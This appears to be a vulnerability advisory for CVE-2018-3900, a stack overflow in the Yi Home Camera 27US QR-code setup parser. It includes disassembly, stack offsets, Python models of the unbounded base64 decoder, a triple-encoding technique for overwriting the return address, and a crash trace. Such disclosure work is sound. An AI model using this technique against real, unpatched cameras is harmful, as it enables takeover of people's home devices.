CVE-2018-3900
An exploitable code execution vulnerability exists in the QR code scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted QR Code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability. Alternatively, a user could be convinced to display a QR code from the internet to their camera, which could exploit this vulnerability.
Yi Technology Home Camera 27US 1.8.7.0D
9.1 – CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWE-121: Stack-based Buffer Overflow
Yi Home Camera is an IoT home camera sold globally. The 27US version is one of the newer models sold in the U.S., and is the most basic model in the Yi Technology camera lineup. It still, however, includes all the functionality that one would expect from an IoT device: viewing from anywhere, offline and subscription-based cloud storage, and ease of setup.
During the network configuration stage of the setup, the Yi camera prompts the user to show it a QR code that is generated by the app running on the user’s phone. The user types in the SSID and password of the network that they wish to connect the camera to, and then the app contacts https://api.us.xiaoyi.com, asking for a bindkey, which is used for identification of the device on the server side.
GET /v2/qrcode/get_bindkey?hmac=<redact> %3D&userid=00110011&seq=1&timestamp=1522268058227 HTTP/1.1
Content-Length: 0
Host: api.us.xiaoyi.com
Connection: Keep-Alive
User-Agent: YI Home/2.20.20.0_20180227 (Alcatel_4060A; Android 10.2; en-US)
Accept-Encoding: gzip
x-xiaoyi-appVersion: android;73;2.20.20.0_20180227
After the response has been received, the phone generates a QR code that contains the following data: b=USmtPf6GnLZYDuR9&s=PCheX14pPg==&p=AbCD123465. Here the b field is the bindkey found in the HTTPS response, s is the base64-encoded SSID of the network, and p is the base64-encoded password that has been encoded against a static string. Note that the password and SSID are not sent over the network; only the bindkey is requested and returned. However, this vulnerability can still be triggered by the end server at this stage if it sends a bindkey that contains the &p= string.
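As a rough illustration of the field layout described above, the following Python sketch splits the example QR payload into its three fields and decodes the SSID. The helper name `split_qr_payload` is hypothetical and is not taken from the app or the firmware. The `p` field is left opaque because the static string used to encode it is not given here.

```python
import base64

def split_qr_payload(payload: str) -> dict:
    """Split 'b=...&s=...&p=...' into a dict (illustrative helper, not firmware code)."""
    fields = {}
    for part in payload.split("&"):
        # Split on the first '=' only, since base64 values may end in '=' padding.
        key, _, value = part.partition("=")
        fields[key] = value
    return fields

qr_payload = "b=USmtPf6GnLZYDuR9&s=PCheX14pPg==&p=AbCD123465"
fields = split_qr_payload(qr_payload)

bindkey = fields["b"]                  # value returned by the server
ssid = base64.b64decode(fields["s"])   # base64-encoded SSID
encoded_password = fields["p"]         # left opaque: the encoding string is not documented here
print(bindkey, ssid, encoded_password)
```

Only the `b` value originates from the server; the other two fields are produced locally on the phone.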
After this QR code has been generated, the user shows it to the camera, which then scans it using the underlying ZBar QR code scanning library (https://github.com/Zbar/Zbar). After the string has been read in by the camera, it is parsed by the following code:
MOV R2, R7 //[1]
LDR R1, =aP ; "&p="
ADD R0, SP, #0x1A8+password_dst
BL trans_json_2 ; (output,needle,haystack) //[2]
MOV R2, R7
LDR R1, =aS ; "&s="
ADD R0, SP, #0x1A8+ssid_dst
BL trans_json_2 ; (output,needle,haystack) //[2]
MOV R2, R7
LDR R1, =aB ; "b="
ADD R0, SP, #0x1A8+bindkey_dst
BL trans_json_2 ; (output,needle,haystack) //[2]
The firmware uses a modified JSON parsing function [2] to grab the value of each of these keys, searching the scanned QR code string held in R7 [1]. The result of each search is stored at an address on the stack (*_dst), laid out as follows:
qrcode_scan
zbar_get_name= -0x1A8
[…]
bindkey_dst= -0x188
decoded_ssid= -0x168
decrypted_key= -0x128
ssid_dst= -0xE8
password_dst= -0xA8
decoded_password= -0x68
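The three `trans_json_2` calls above can be modeled roughly in Python to see why a bindkey containing `&p=` matters. This is a sketch under assumptions: the body of `trans_json_2` is not shown here, so the model below (`extract_after`, a hypothetical name) assumes it takes the first occurrence of the needle and copies up to the next `&` or the end of the string. The tampered bindkey is made up for illustration.

```python
def extract_after(haystack: str, needle: str) -> str:
    """Assumed behaviour: return the text after the first needle, up to the next '&'."""
    start = haystack.find(needle)
    if start < 0:
        return ""
    start += len(needle)
    end = haystack.find("&", start)
    return haystack[start:] if end < 0 else haystack[start:end]

normal = "b=USmtPf6GnLZYDuR9&s=PCheX14pPg==&p=AbCD123465"

# Hypothetical server response in which the bindkey itself carries an "&p=" field.
injected_bindkey = "USmt&p=ATTACKERDATA"
tampered = "b=" + injected_bindkey + "&s=PCheX14pPg==&p=AbCD123465"

normal_password = extract_after(normal, "&p=")
tampered_password = extract_after(tampered, "&p=")
print(normal_password, tampered_password)
```

Under that assumption, the first `&p=` match falls inside the server-supplied bindkey, so the server rather than the user decides what reaches the password buffer.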
Immediately after reading these values onto the stack, the password and ssid values are base64 decoded with a custom implementation of the conversion:
ADD R1, SP, #0x1A8+decoded_ssid
ADD R0, SP, #0x1A8+ssid_dst
BL b64_decode ; (input,output)
MOV R1, R5 // [1]
ADD R0, SP, #0x1A8+password_dst
BL b64_decode ; (input,output)
Importantly, the output of both calls to b64_decode also goes on the stack. The destination for the password decoding is R5 [1], which is the decoded_password variable on the stack, conveniently located immediately above the return address. The underlying bug is within the b64_decode function, which imposes no size constraint on its output. The function never exits unless it detects an equals sign or a null byte in the processed data, and only at certain offsets within the buffer.
LDRB R3, [R4,#-1]
MOV R6, R4
CMP R3, #0
BEQ func_prolog
[…]
LDRB R2, [R4,#1]
ADD R1, R10, #1
CMP R2, #'='
BEQ ret_path
[...]
CMP R3, #'='
ADD R5, R5, #3
BEQ ret_path
It follows that if someone passes a string without any equals signs (or nulls), the decoder simply keeps going, which can easily result in a buffer overflow: the stack destinations are all 0x40 bytes long, but the input string is bounded only by the QR reader implementation itself, which appears to be able to read only QR codes that store ~263 (0x107) bytes of data.
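To make the missing bound concrete, here is a simplified Python model of a decoder that, like the b64_decode described above, stops only on `=` or a NUL byte and never checks the destination size. It is a sketch, not a reconstruction of the firmware routine: the names `unbounded_b64_decode` and `DEST_SIZE`, the once-per-group terminator check, and the handling of invalid characters are all assumptions.

```python
import base64

ALPHABET = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
DEST_SIZE = 0x40  # size of each stack destination, per the text above

def unbounded_b64_decode(src: bytes) -> bytes:
    """Decode 4 characters at a time until '=' or NUL; no output limit (model only)."""
    out = bytearray()
    i = 0
    while i + 4 <= len(src):
        group = src[i:i + 4]
        if group[0] == 0 or b"=" in group:
            break  # the only exit conditions in this model
        n = 0
        for c in group:
            # Characters outside the alphabet are treated as 0 here (an assumption).
            n = (n << 6) | max(ALPHABET.find(bytes([c])), 0)
        out += n.to_bytes(3, "big")
        i += 4
    return bytes(out)

# 0x60 base64 characters with no '=' padding decode to 0x48 bytes.
encoded = base64.b64encode(b"A" * 0x48)
decoded = unbounded_b64_decode(encoded + b"\x00")
overflow = len(decoded) - DEST_SIZE
print(hex(len(encoded)), hex(len(decoded)), overflow)
```

In this model a 0x60-character input, well under the ~0x107-byte QR limit, already produces 8 bytes more than a 0x40-byte destination can hold.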
Regardless, when decoding the password field from password_dst to decoded_password, an interesting thing occurs when passing in a base64-encoded password of length 0x40, due to the layout of the stack:
[...]
password_dst= -0xA8
decoded_password= -0x68
(return_address)
(old_stack_base)
Since the source and the destination are next to each other, as long as neither contains = or \x00, the program keeps decoding further and further down the stack and starts reusing the decoded_password field as the source of its decoding. This allows us to write further down than intended, as long as the decoded base64 is itself valid base64-encoded data.
Since base64 decoding shrinks the data by 25% from input length to output length, the first pass of decoding reaches [decoded_password+0x30], since the input length is 0x40. Then, as long as our data is base64 encoded twice, decoding continues another 0x24 bytes into the destination, resulting in a write to [decoded_password+0xc]. Finally, as long as those last 0x24 bytes have also been base64 encoded, we can write further down the stack, reaching the return address with a controlled write by triply base64 encoding the final payload.
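The chained decoding can be checked with a small Python simulation. This is a sketch under assumptions: memory is modeled as a flat `bytearray` with password_dst at offset 0 and decoded_password directly after it, the model decoder stops when a 4-character group starts with NUL or contains `=`, and the 27-byte marker payload (starting with a NUL so that the model terminates cleanly) is made up for illustration. Offsets are relative to this simplified layout, not to the real stack frame.

```python
import base64

ALPHABET = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
SRC, DST = 0x00, 0x40  # modeled password_dst and decoded_password (adjacent)

def decode_in_place(mem: bytearray, src: int, dst: int) -> int:
    """Model decoder: read 4 chars at src, write 3 bytes at dst, until NUL or '='.
    Returns the number of bytes written."""
    start = dst
    while True:
        group = bytes(mem[src:src + 4])
        if group[0] == 0 or b"=" in group:
            return dst - start
        n = 0
        for c in group:
            # Characters outside the alphabet are treated as 0 (an assumption).
            n = (n << 6) | max(ALPHABET.find(bytes([c])), 0)
        mem[dst:dst + 3] = n.to_bytes(3, "big")
        src, dst = src + 4, dst + 3

payload = b"\x00" + b"\x90" * 26   # 27 bytes (0x1b), illustrative marker only
once = base64.b64encode(payload)   # 0x24 characters
twice = base64.b64encode(once)     # 0x30 characters
thrice = base64.b64encode(twice)   # 0x40 characters, no '=' at any layer

mem = bytearray(0x200)
mem[SRC:SRC + len(thrice)] = thrice
written = decode_in_place(mem, SRC, DST)

print([hex(len(x)) for x in (payload, once, twice, thrice)], hex(written))
```

In this model the three passes write 0x30, 0x24 and 0x1b bytes in turn, so a single call that was meant to fill a 0x40-byte buffer ends up writing 0x6f bytes, with the raw payload landing last.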
This payload is not triggered until the function actually returns, which only occurs once a valid code has been scanned. Thus, if a malicious code is scanned before the owner scans the QR code carrying their own network credentials, the payload is triggered as soon as a network connection is gained, so users should not scan QR codes from untrusted sources on the internet. Alternatively, as discussed earlier, the server could send back the p and s strings, triggering the vulnerability as well.
Thread 1 "rmm" received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb) bt
#0 0x90909090 in ?? ()
#1 0xb6eb33a0 in ?? () from /lib/libc.so.0
#2 0xfffffffe in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) info reg
r0 0x0 0
r1 0x0 0
r2 0xd7be687b 3619580027
r3 0xd7be687b 3619580027
r4 0x51434a6b 1363364459
r5 0x51434a6b 1363364459
r6 0x51434a6b 1363364459
r7 0x51434a6b 1363364459
r8 0x90909090 2425393296
r9 0x90909090 2425393296
r10 0x90909090 2425393296
r11 0x90909090 2425393296
r12 0xb6f00210 3069182480
sp 0xbea51ae8 0xbea51ae8
lr 0xb6eb33a0 3068867488
pc 0x90909090 0x90909090
cpsr 0x68000010 1744830480
2018-05-01 - Vendor disclosure
2018-09-03 - Vendor submitted build to Talos for testing
2018-09-05 - Talos confirmed issue patched
2018-10-22 - Vendor released new firmware
2018-10-31 - Public release
Discovered by Lilith (>_>) of Cisco Talos.